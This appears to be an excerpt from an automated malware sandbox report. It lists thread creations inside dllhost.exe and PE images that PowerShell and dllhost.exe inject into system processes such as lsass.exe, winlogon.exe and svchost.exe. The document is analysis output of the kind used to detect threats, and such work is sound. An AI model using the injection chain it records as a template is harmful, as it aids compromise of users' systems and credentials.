Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 595A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30AF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 80B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5AEE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CF52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BCD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BF02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 6F092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED7F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD8E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF9E2EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D2660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D9540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AF660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
